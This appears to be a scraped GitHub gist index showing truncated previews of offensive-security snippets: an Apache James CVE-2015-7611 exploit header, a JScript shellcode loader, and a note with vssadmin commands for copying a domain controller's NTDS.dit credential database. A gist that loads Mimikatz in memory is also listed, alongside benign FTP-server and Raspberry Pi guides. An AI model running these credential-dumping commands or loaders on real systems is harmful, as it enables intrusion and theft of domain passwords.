Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000
iamtutu iamtutu
iamtutu
/ apache-james-exploit.py
Created
October 3, 2017 19:25
— forked from kjiwa/apache-james-exploit.py
An exploit for Apache James 2.3.2 that executes remote commands. https://crimsonglow.ca/~kjiwa/#/exploiting-apache-james
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """An exploit for Apache James 2.3.2 that executes remote commands. | |
| This script creates a new user and enqueues a payload to be executed the next | |
| time a user logs in to the machine. The vulnerability is documented in | |
| CVE-2015-7611. | |
| For more details, see http://www.securityfocus.com/bid/76933 and | |
| https://www.exploit-db.com/exploits/35513/. | |
| """ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import System; | |
| import System.Runtime.InteropServices; | |
| import System.Reflection; | |
| import System.Reflection.Emit; | |
| import System.Runtime; | |
| import System.Text; | |
| //C:\Windows\Microsoft.NET\Framework\v2.0.50727\jsc.exe Shellcode.js | |
| //C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe Shellcode.js | |
iamtutu
/ exploit.php
Created
August 5, 2017 16:28
— forked from MKorostoff/exploit.php
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * @author Matt Korostoff <mkorostoff@gmail.com> | |
| * | |
| * @copyright Licensed under the GNU General Public License as published by the Free | |
| * Software Foundation, either version 3 of the License, or (at your option) | |
| * any later version. http://www.gnu.org/licenses/ | |
| * | |
| * @usage php path/to/this/file.php 'http://example.com' | |
| */ |
iamtutu
/ web-servers.md
Created
July 4, 2017 11:48
— forked from willurd/web-servers.md
Big list of http static server one-liners
iamtutu
/ ftpserver.py
Created
July 4, 2017 10:50
— forked from scturtle/ftpserver.py
simple ftp server by python
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| # coding: utf-8 | |
| import os,socket,threading,time | |
| #import traceback | |
| allow_delete = False | |
| local_ip = socket.gethostbyname(socket.gethostname()) | |
| local_port = 8888 | |
| currdir=os.path.abspath('.') |
iamtutu
/ bin2sc.py
Created
May 10, 2017 18:22
— forked from superkojiman/bin2sc.py
Convert bin to shellcode.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import sys | |
| if __name__ == "__main__": | |
| if len(sys.argv) < 2: | |
| print "usage: %s file.bin\n" % (sys.argv[0],) | |
| sys.exit(0) | |
| shellcode = "\"" | |
| ctr = 1 | |
| maxlen = 15 |
iamtutu
/ HowToOTG.md
Created
November 29, 2016 08:54
— forked from gbaman/HowToOTG.md
Simple guide for setting up OTG modes on the Raspberry Pi Zero
Simple guide for setting up OTG modes on the Raspberry Pi Zero - By Andrew Mulholland (gbaman).
The Raspberry Pi Zero (and model A and A+) support USB On The Go, given the processor is connected directly to the USB port, unlike on the B, B+ or Pi 2 B, which goes via a USB hub.
Because of this, if setup to, the Pi can act as a USB slave instead, providing virtual serial (a terminal), virtual ethernet, virtual mass storage device (pendrive) or even other virtual devices like HID, MIDI, or act as a virtual webcam!
It is important to note that, although the model A and A+ can support being a USB slave, they are missing the ID pin (is tied to ground internally) so are unable to dynamically switch between USB master/slave mode. As such, they default to USB master mode. There is no easy way to change this right now.
It is also important to note, that a USB to UART serial adapter is not needed for any of these guides, as may be documented elsewhere across the int
iamtutu
/ HowToOTGFast.md
Created
November 29, 2016 08:54
— forked from gbaman/HowToOTGFast.md
Simple guide for setting up OTG modes on the Raspberry Pi Zero, the fast way!
###Setting up Pi Zero OTG - The quick way (No USB keyboard, mouse, HDMI monitor needed)
More details - http://blog.gbaman.info/?p=791
For this method, alongside your Pi Zero, MicroUSB cable and MicroSD card, only an additional computer is required, which can be running Windows (with Bonjour, iTunes or Quicktime installed), Mac OS or Linux (with Avahi Daemon installed, for example Ubuntu has it built in).
1. Flash Raspbian Jessie full or Raspbian Jessie Lite onto the SD card.
2. Once Raspbian is flashed, open up the boot partition (in Windows Explorer, Finder etc) and add to the bottom of the config.txt file dtoverlay=dwc2 on a new line, then save the file.
3. Finally, open up the cmdline.txt. Be careful with this file, it is very picky with its formatting! Each parameter is seperated by a single
iamtutu
/ AD domain offline cracking #pentest
Created
October 13, 2016 18:25
— forked from ddouhine/AD domain offline cracking #pentest
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Microsoft stores the Active Directory data in tables in a proprietary ESE database format. The database is contained in the NTDS.dit (%SystemRoot%\ntds\NTDS.dit) file. | |
| This file is encrypted to prevent any data extraction, so we will need to acquire the key to be able to perform the extraction of the target data. | |
| The required Password Encryption Key is stored in the NTDS.dit file, but is encrypted itself with the BOOTKEY. | |
| To obtain this BOOTKEY, we need to acquire a copy of the SYSTEM registry hive (%SystemRoot%\System32\config\System) from the same Domain Controller as we acquired the NTDS.dit file. | |
| Extract NTDS/SYSTEM from a domain controller: | |
| net start vss | |
| vssadmin create shadow /for=c: | |
| vssadmin list shadows | |
| copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\temp |
iamtutu
/ netkatz.cs
Created
August 12, 2016 11:57
Downloads and Executes Mimikatz In Memory From GitHub
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Net; | |
| using System.Text; | |
| using System.IO.Compression; | |
| using System.Collections.Generic; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |